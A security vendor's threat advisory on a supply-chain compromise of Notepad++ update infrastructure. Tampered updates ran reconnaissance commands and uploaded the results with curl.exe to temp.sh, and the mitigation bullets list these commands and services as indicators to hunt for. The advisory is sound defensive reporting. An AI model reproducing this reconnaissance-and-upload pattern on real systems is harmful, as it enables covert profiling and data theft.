Update: Chinese state‑linked actors compromised Notepad++ update infrastructure

Threat summary

New analysis published on February 3, 2026, provides additional clarity on how threat actors leveraged the Notepad++ update mechanism. The latest findings confirm that the threat actors selectively manipulated Notepad++ auto‑update responses to deliver modified executables to specific IP address ranges, enabling them to collect reconnaissance data from targeted systems while avoiding broad detection.

The report by Securelist also shows that the activity was more diverse and technically complex than initially understood. Earlier assessments focused on activity in Asia, but the new analysis identifies victims in Vietnam, El Salvador, Australia, and the Philippines. Those affected included individuals, as well as a government organization, financial institution, and information technology service provider, indicating interest in those specific sectors and end users.

The adversaries used three distinct infection chains delivered through manipulated update responses, each executing reconnaissance commands, collecting system information, and uploading the results to a public file‑sharing service-a pattern. This matches a community observation from January 22, 2026, where a user reported the Notepad++ updater sending collected data to temp.sh, with Securelist’s findings indicating this activity was part of the same operation.

The malicious update files executed commands such as systeminfo, tasklist, and whoami, wrote the output to a temporary file, and uploaded it using curl.exe. The collected data included system configuration, running processes, user accounts, and network state.

Analysis & mitigation

The operation shows how the compromised update channel was used to profile systems and identify potential high‑value targets, highlighting continued threat actor interest in software supply‑chain access.

A thorough response to this threat would include:

• Review endpoint logs for unexpected execution of reconnaissance commands (e.g., `systeminfo`, `tasklist`, `whoami`, `ipconfig`, `netstat`) initiated specifically by the Notepad++ process. Such activity would indicate that a compromised update may have been executed.
• Investigate outbound connections to `temp.sh` or other public file‑sharing or paste‑style services that may have been used for exfiltration or staging.
• Reinstall the latest version of Notepad++ from a trusted source, ensuring the environment is running a clean build. The current versions include hardened update‑signature verification, which prevents tampered or unsigned updates from being accepted going forward.
• Rotate credentials on any systems where reconnaissance activity may have occurred. In parallel, review DNS and network logs for signs of redirected update traffic or suspicious outbound requests and validate the integrity of Notepad++ binaries across managed endpoints to ensure no compromised executables remain.
• Monitor for unauthorized use of `curl.exe` or similar command‑line tools that may indicate scripted reconnaissance or data exfiltration. Additionally, review temporary directories for artifacts such as reconnaissance output files or scripts dropped during malicious activity.
• Note that even if an older version of Notepad++ was used during the June–December 2025 compromise window, this does not automatically mean that a malicious certificate was installed. The compromised update infrastructure did not distribute fraudulent certificates to all users, and most systems never received them. In normal circumstances, and especially if certificates were never imported manually, these stores are typically clean, and no unexpected entries should appear. Certificate verification may be prudent in situations where there are indicators of compromise, such as security alerts, unusual file hashes, or installers obtained from unofficial sources. Legitimate Notepad++ releases are signed with a GlobalSign certificate, so you should not see any self‑signed certificates referencing Notepad++, certificates from unknown or suspicious publishers, or entries with unclear or unusual names.

Field Effect MDR clients are well-protected with layered visibility across endpoints, network traffic, and post-compromise behavior that provides strong coverage against the tactics used in this type of supply-chain compromise.

Field Effect MDR users would be alerted via ARO if vulnerable versions or indicators of compromise are detected in their environment.

Stay on top of emerging threats like this.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up